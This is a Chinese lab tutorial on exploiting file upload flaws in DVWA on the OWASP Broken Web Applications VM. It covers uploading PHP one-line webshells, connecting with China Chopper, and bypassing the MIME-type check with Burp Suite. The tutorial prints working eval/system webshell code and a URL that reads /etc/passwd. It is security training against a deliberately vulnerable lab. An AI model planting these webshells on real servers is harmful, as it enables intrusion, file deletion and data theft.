实验环境

目标靶机:OWASP_Broken_Eeb_Apps_VM_1.2

下载地址:https://sourceforge.net/projects/owaspbwa/files/

百度云链接:链接:https://pan.baidu.com/s/1tyLOkABir4ChpSDOy50g8Q
提取码:wf4q

OWASP Broken Web Applications Project
Broken Web Applications ( BWA )项目生成一一个虚拟机,运行各种具有已知漏洞的应用程序,供以下人员使用:

-了解Web应用程序安全性
-测试手册评估技术
-测试自动化工具
-测试源代码分析工具
-观察网络攻击:
-测试WAF和类似的代码技术

测试渗透机:kali-linux

链接:https://pan.baidu.com/s/1U1FBI8NlMkwBf1BmViv7Sw
提取码:sdn9

实验原理

1、文件.上传( File Upload )是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等
2、正常的文件-般是文档、 图片、视频等, Web应用收集之后放入后台存储,需要的时候再调用出来返回
3、如果恶意文件如PHP、ASP等执行文件绕过web应用,并顺利执行,则相当于黑客直接拿到了Webshell
4、一旦黑客拿到Webshell ,则可以拿到web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网
5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击web服务,实际渗透两种相结合,达到对目标的深度控制

实验一

低安全模式下,上传任意文件类型的文件,文件大小限制

打开靶机
在这里插入图片描述
进入web界面选择DVWA
在这里插入图片描述
登录名和密码是:admin
选择文件上传
在这里插入图片描述
在这里插入图片描述
查看低安全模式下源码

代码缺陷:
1、没有对文件类型进行过滤,本意接受上传图片,实际却可以上传php;
2、对文件大小限制为100K其实没有用。由于是客户端进行限制的,利用截断,我们可以轻易修改文件大小限制;
在这里插入图片描述
上传PHP文件
在这里插入图片描述
通过文件上传"一句话木马"的php,中国菜刀获取靶机的webshell
在这里插入图片描述
在这里插入图片描述
文件管理(可进行增删改操作)
在这里插入图片描述
获取到的SHELL
在这里插入图片描述

实验二

中安全模式下对文件类型进行了限制,采用绕过类型上传文件

修改mime类型
在这里插入图片描述
在这里插入图片描述
中安全模式上传PHP显示
在这里插入图片描述
使用工具BURPSUIT进行代理,kali里面包含了这个工具
在这里插入图片描述
开启代理后上传PHP
在这里插入图片描述
修改MIME后进行转发
在这里插入图片描述
在这里插入图片描述
后续步骤中国菜刀进行,和实验一类似

实验三

切换到高安全模式下
在这里插入图片描述

webshell

小马:一句话木马也称小马,即整个shell代码量只有一行,一般是系统执行函数。

大马:代码量功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到

shell2.php   #eval 使用php函数,例如phpinfo();
<?php eval($_REQUEST['cmd']);?>

http://192.168.1.132/dvwa/hackable/uploads/shell2.php?cmd=phpinfo();
shell3.php   #system  使用Linux系统命令,例如ls cp  rm
<?php system($_REQUEST['limao']);?>
http://192.168.1.132/dvwa/hackable/uploads/shell2.php?limao=cat /etc/passwd

中国菜刀

<?php eval($_POST['cmd']);?>

说明:REQUEST是在网页输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构

在这里插入图片描述

Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐